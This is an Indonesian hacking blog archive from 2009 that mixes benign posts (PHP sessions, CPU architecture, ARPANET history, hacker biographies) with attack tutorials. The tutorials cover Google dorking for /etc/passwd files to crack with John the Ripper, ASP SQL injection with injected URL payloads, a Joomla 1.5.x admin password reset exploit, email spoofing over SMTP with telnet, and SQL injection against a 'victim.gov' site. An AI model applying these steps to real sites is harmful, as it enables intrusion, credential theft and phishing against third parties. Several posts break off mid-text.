Dec 25, 2009

Crack wih jhon the ripper

::---||-[1]. PREFACE
   ---------------------

     John The Ripper?? Siapa sich yang nggak kenal dengan tools Cracking yang kaya fitur ini.. ;) Walaupun usianya sudah uzur, tapi kemampuannya  tetap bisa diandalkan. Mungkin tutorialnya dah lama yach.. sorry  nich,  kebetulan lagi banyak yang request, so bagi yang udah bosan dengan tutorial yang berbau John The Ripper.. ngapain juga masih baca sampai baris ini!! ;P


 
   ::---||-[2]. Mencari Target
   ----------------------------
 
     Sekarang kita akan mencari target. Biasa.. kita mampir ke rumahnya paman
   Google (google.com). Ketik keyword berikut lalu klik tombol search:
  
                 Inurl:/etc/passwd/
 
     Eits.. tunggu dulu.. maksudnya apaan nich?? Okay, gue jelasin yach....   Untuk melakukan password cracking, kita khan harus tau dimana file password yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.
 

Dec 24, 2009

ASP SQL Injection

tep 1: find a site with asp, like ex. http://www.site.com/news.asp?id=2

step 2: add after 2 with space; and 1=0 OR and 1=1
so: http://www.site.com/news.asp?id=2 and 1=0

By 1=0 you should get an error, or empty page like:


ADODB.Field error '80020009'


Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


/default.asp, line 0


and with 1=1 you need to get a normal page.

step 3: add after the 2 without space (yes remove step 2 text) ;


+union+select+0+from+cruz3n

Joomla 1.5.x Remote Admin Password Chang

#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################

File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model
$model = &$this->getModel('Reset');

Dec 22, 2009

Kegunaan sesion

Apa sih gunanya session di PHP? Beberapa pengunjung setia blog saya ini menanyakan hal tersebut ke saya baik lewat email, YM atau sekedar komentar di blog ini. Nah… melalui tulisan inilah, saya akan berusaha untuk menjawabnya.
Secara umum, session digunakan untuk menyimpan suatu informasi antar proses request, baik request dalam bentuk POST atau GET. Bingung yah ?? He.. he.. he… OK saya akan ambil contoh untuk menggambarkan hal ini.

Salah satu contoh yang menggambarkan penggunaan session adalah proses login. Dalam hal ini user akan memasukkan usernamenya melalui form login. Setelah login berhasil, user tersebut dihadapkan pada link menu navigasi yang menuju ke beberapa halaman web. Nah… apabila kita ingin username tersebut akan selalu tampil atau tercatat di halaman-halaman web tersebut, maka username tadi haruslah disimpan dalam session.
Untuk memudahkan lagi pemahaman, silakan Anda buat script yang menggambarkan keadaan di atas.
Pertama-tama kita buat form login terlebih dahulu

Perbedaan 32 Bit dengan 64 Bit

Cuma memberikan penjelasan pada teman-teman bloger atau pembaca artikel ini saya gak tau kok bisa-bisanya posting artikel gak begitu penting tapi banyak yang bertanya kepada saya apa perbedaanya. Okey, kita mulai dari istilah "32-bit" dan "64-bit" itu dulu. 32-bit dan 64-bit mengacu pada arsitektur processor. Processor 32-bit artinya register2 nya (unit penyimpanan data terkecil di dalamnya) berukuran 32 bit. Processor 64-bit artinya register2 nya berukuran 64 bit.( Register2 ini lah yang digunakan untuk melakukan macam2 operasi. Misalnya c = a + b, maka register "eax" akan me-load nilai dari "a" (di memory), kemudian pada register "eax" ditambahkan nilai dari "b", lalu "eax" ditulis ke memory pada posisi variabel "c" ) Pengaruh ukuran register terhadap kecepatan: Setiap proses baca/tulis dari memory (disebut dengan load/store) membaca/menulis informasi sebesar ukuran register; maka register 64-bit potensial membaca/menulis memory 2x kecepatan register 32-bit. Tapi ini teoretis saja, karena kenyataannya prosesor juga menghabiskan waktu untuk melakukan hal-hal lain selain load/store, seperti pemrosesan matematis, vector-processing, dll.

Dec 19, 2009

Gagal Jadi Cleaning Service, Malah Jadi orang Kaya

Seorang pemuda tamatan SMA melamar pekerjaan menjadi cleaning cervices di perusahaan paling kesohor di negaranya. Setelah tes dan wawancara, sang pemuda tadi diberi tahu oleh manager SDM perusahaan tersebut bahwa ia dinyatakan lulus. Manager SDM berkata kepadanya : Terkait dengan kapan Anda mulai bekerja dan apa saja yang akan menjadi kewajiban Anda, nanti akan diinformasikan langsung via email.
Mendengar kata “email” itu, sang pemuda tadi berkata dengan santai : Saya gak punya komputer dan gak punya email pak… Lalu, sang manager SDM kaget sambil berkata : Hari gini Anda gak punya email? Yang gak punya email berarti ia mati dan orang mati tidak berhak bekerja. Kalau begitu, Anda dinyatakan gagal. Mendengar ucapan tersebut pemuda yang tadinya terlihat gesit dan semangat itu, tiba-tiba lemas dan terlihat amat kesal bercampur kecewa. Mukanya jadi lesu dan pandangannya jadi ngambang.
Tak lama kemudian, ia pulang sambil menelan kepedihan dalam hati yang tak terhingga. Pupus sudah impian dan cita-citanya untuk bekerja di perusahaan besar itu, hanya gara-gara tidak memiliki saluran komunikasi maya yang bernama “email”.

Dec 18, 2009

Mengirim Email Palsu

pertama pertama yang di butuhkkan adalah mail server atau bahasa kerennya smtp server, email server ini bisa di dapat dari persahaan maupun dari tempat universitas kalian :-p , atau juga bisa di cari dengan paman google ,setalah dapet mail server.misal dapat mail server dengan nama , serveremailku.com Kemudian lets hack :D

telnet serveremailku.com 25
25 artinya adalah Port dari protokol SMTP. Jadi maksud perintah diatas adalah menjalankan Telnet untuk menghubungkan ke server “serveremailku.com” pada port 25.
Tunggu aja, harusnya cepet, ntar kalo berhasil bakal muncul ucapan Selamat datang, atau kalo gak bakal muncul versi software dari email server. Yang jelas pesan dari server adalah berkode 220. Oya, maksud dari kode balasan adalah, misalkan anda mendapat balasan pesan dari server :
250 OK
itu artinya, pesan balasan berkode 250. Yang menjadi acuan balasan dari server adalah kode pesannya, BUKAN KALIMAT SETELAH KODE PESAN !!! Paham dul? lanjut….
Selanjutnya ketikan :   HELO local.domain.net
Itu artinya kalian memberi tahu server bahwa nama kalian (nama domain kamu) adalah local.domain.net . Di sini, local domain.net bisa kalian ganti dengan local IP. Apabila Sukses, anda akan mendapat Reply dengan kode pesan : 250 . Perintah HELO adalah opsional, tidak semua server meminta anda, tetapi terkadang ada server yang mengharuskan anda untuk menggunakan HELO.
Selanjutnya ketikkan –>  MAIL FROM: pengirim@serveremailku.com
Apabila alamat pengirim accepted , seharusnya kode balasannya adalah 250 .
Langkah selanjutnya, ketikkan –> RCPT TO: penerima@domain.com
Apabila alamat penerima accepted , seharusnya kode balasannya adalah 250. Apabila anda mendapat kode balasan 553 atau 550 itu artinya, server tidak mau me-relay email ke alamat tujuan. Bisa jadi dikarenakan, alamat tujuan berada di luar domain server, atau bisa karena alamat tujuan tidak berada pada List of allowed recipient host.
Perintah selanjutnya adalah ketikkan –>  DATA
Apabila sukses, server akan membalas dengan kode balasan 354 . Dengan mengetikkan DATA artinya anda akan memulai mengetikkan pesan atau message untuk penerima.
Langkah selanjutnya adalah mengetikkan pesan. Apabila anda berniat mengirimkan email sederhana, langsung saja ketikkan pesan. Untuk mengakhiri pesan ketikkan    .  {dieja: enter - titik - enter} . Jika sukses, akan mendapatkan balasan dari server dengan kode balasan 250 .
Nah jika anda ingin yang agak komplex dikit, setelah data anda harus mengetikkan sebagai berikut

From: Nama To: Nama
Cc: Nama

Subject: Judul Pesan

Apa sih itu? OK saya jelaskan. From, To, itu bisa kalian isi dengan alamat email pengirim dan penerima. From-To dengan “MAIL FROM”-”RCPT TO” artinya sama tapi beda implementasinya. Sama, maksudnya sama sama diisi alamat email pengirim dan penerima. Beda implementasi, maksudnya alamat From-To itu yang akan ditampilkan ke penerima, sedangkan “MAIL FROM”-”RCPT TO” tidak ditampilkan. Apa keanehan di sini? tentu saja anda bisa memasukkan From dan To , tetapi berbeda dengan alamat yang ada pada “MAIL FROM” dan “RCPT TO”. Misal jika anda memasukkan MAIL FROM: dewodewi@gmail.com , tetapi pada Field From anda ketikkan From: Caleg . Maka pada pihak penerima akan ditampilkan bahwa ia mendapat email dari caleg@gmail.com , bukan dari dewodewi@gmail.com

Dec 17, 2009

Kenapa Indonesia Ga maju-maju

Saya dapat tulisan ini dari Muh Subandi , forwardan, penulisnya Ika S. Creech, Putra Indonesia Asli, kini bertempat tinggal di
Paris, Perancis dan bekerja sebagai Pembawa Acara di salah satu
stasiun di Perancis.
"NDESO"
oleh : Ika S. Creech *)
Deso (baca ndeso) itulah sebutan untuk orang yang norak, kampungan,
udik, shock culture, Countrified dan sejenisnya. Ketika mengalami atau merasakan sesuatu yang baru dan sangat mengagumkan, maka ia merasa takjub dan sangat senang, sehingga ingin terus menikmati dan
tidak ingin lepas, kalau perlu yang lebih dari itu. Kemudian ia menganggap hanya dia atau hanya segelintir orang yang baru merasakan dan mengalaminya. Maka ia mulai atraktif, memamerkan dan sekaligus mengajak orang lain untuk turut merasakan dan menikmatinya, dengan harapan orang yang diajak juga sama terkagum-kagum sama seperti dia.

Ingin tahu bahasa pemrograman yang paling banyak digunakan di dunia? Untuk mengukur secara tepat memang sulit. Tetapi TIOBE Index memberikan index dari gambaran banyaknya programmer, pelatihan dan pihak ketiga dengan menggunakan algoritma perhitungan berdasarkan pencarian dari Google, MSN, Yahoo dan YouTube.

Konsep jaringan dan sejarahnya

sejarah TCP/IP dan Internet


Pada tahun 1969, lembaga riset departemen pertahanan Amerika,DARPA (Defence advance Research Project Agency),
Mendanai sebuah riset untuk mengembangkan jaringan komunikasi data antar komputer. Riset ini bertujuan untuk
mengembangkan aturan komunikasi data Antar komputer yang:
- Bekerja secara transparan, melalui bermacam-macam jaringan komunikasi data yang terhubung satu dengan yang lain.
- Tahan terhadap berbagai ganguan (bencana alam, serangan nuklir dan lain-lain)
Pengembangan jaringan ini ternyata sukses dan melahirkan ARPANET.Tahun 1972, ARPANET didemontrasikan
didepan peserta the first international Cenference on Computer Communication dengan menghubungkan 60 Node.
Aplikasi internet yang pertama kali ditemukan adalah FTP. Menyusul kemudian e-mail, dan telnet, e-mail menjadi
aplikasi yang paling popular dimasa ARPANET, tahun 1979 tercatat sebagai tahun berdirinya USENET yang pada
awalnya menghubungkan Universitas Duke dan UNC. Grup yang pertama kali dibentuk dalam USENET ADALAH Grup
net.

Bahasa pemrograman paling banyak digunakan di dunia

Ingin tahu bahasa pemrograman yang paling banyak digunakan di dunia? Untuk mengukur secara tepat memang sulit. Tetapi TIOBE Index memberikan index dari gambaran banyaknya programmer, pelatihan dan pihak ketiga dengan menggunakan algoritma perhitungan berdasarkan pencarian dari Google, MSN, Yahoo dan YouTube.
Index tersebut dapat digunakan untuk mengecek apakah bahasa pemrograman yang kita gunakan masih up to date atau untuk membuat keputusan yang strategis tentang bahasa pemrograman apa yang akan digunakan untuk membangun sebuah sistem software baru.

Bahasa Pemrograman Lainnya
Untuk Daftar lengkap sampai 50 bahasa pemrograman adalah sebagai berikut :
Position Prog. Language Ratings
Position Prog. language Ratings
Bahasa Pemrograman yang ke 50 sampai 100
Berikut daftar sampai yang ke 100 ( diurutkan secara abjad, karena perbedaannya sangat kecil).
ABC, Algol, Alpha, Applescript, AspectJ, Beta, Boo, cg, Clean, Csh, cT, Curl, DC, Dylan, Eiffel, EXEC, Factor, Felix, Focus, Icon, IDL, Inform, Io, Limbo, Lingo, MAD, Magic, Maple, Mathematica, Modula-2, MOO, MUMPS, Oberon, Occam, Oz, Pike, Postscript, Powerbuilder, Progress, Q, REALbasic, Rebol, S-lang, Scala, SIGNAL, SPSS, VBScript, Verilog, VHDL, XSLT
Sebenarnya akan lebih bagus dan bermanfaat jika dijelaskan Statistik di setiap negara, karena saya yakin representasi diatas akan jauh berbeda. Misalnya Delphi di Indonesia atau di Eropa (Rusia) akan lebih banyak penggunanya daripada di Amerika Serikat.

thanx to: ebsoft.web.id

Perjalan hidup Kevin Mitnick

Sebuah ketukan terdengar dari pintu apartemennya, Kevin Mitnick membuka pintu dan mendapati lusinan agen FBI dan penegak hukum lain sudah bersiap untuk menangkapnya. Ini adalah akhir perjalanan seorang hacker yang terpaksa buron demi menghindari hukuman penjara. Hacker yang selama masa buronannya itu telah mendapatkan status legendaris, bahkan telah tumbuh menjadi sebuah mitos yang lebih besar dari dirinya sendiri
Penangkapan yang terjadi pada 1995 itu menandai awal dari kasus penahanan yang paling kontroversial terhadap seorang pelaku kejahatan cyber. Mitnick adalah seorang penyusup pada sistem komputer menjelma sebagai America's Most Wanted Hacker.

Legenda Hacker

1. Richard Stallman
Nickname : tidak ada (tidak ada yang harus disembunyikan)
Salah seorang ‘Old School Hacker’, bekerja pada lab Artificial
Intelligence MIT. Merasa terganggu oleh software komersial dan dan
hak cipta pribadi. Akhirnya mendirikan GNU (baca: guhNew) yang
merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York
Scintific Center saat berumur 16 tahun.
————————-
2. Dennis Ritchie dan Ken Thomson
Nickname : dmr dan ken
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson
menulis sistem operasi UNIX yang elegan.
—————————

Melacak Email Palsu

Wah sudah lama ga nulis artikel.
jadi kangen
:-p

Email meruakan salah satu fasilitas dalam dunia internet., email biasanya dapat dikirim dari webmail maupun enggunakan smpt server.permasalahnnya disini sangat banyak di internet smtp2 server yang dapat digunakan dengan gratis , sehingga dengan mudah dapat mengirimkkan email palsu...

Step By step Sql Injection

This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.1. The target is http://www.victim.gov/agent_detail.php?aid=9 We check the the site, is this site have bug. We only need to add single quote in last url. So the url be: http://www.victim.gov/agent_detail.php?aid=9'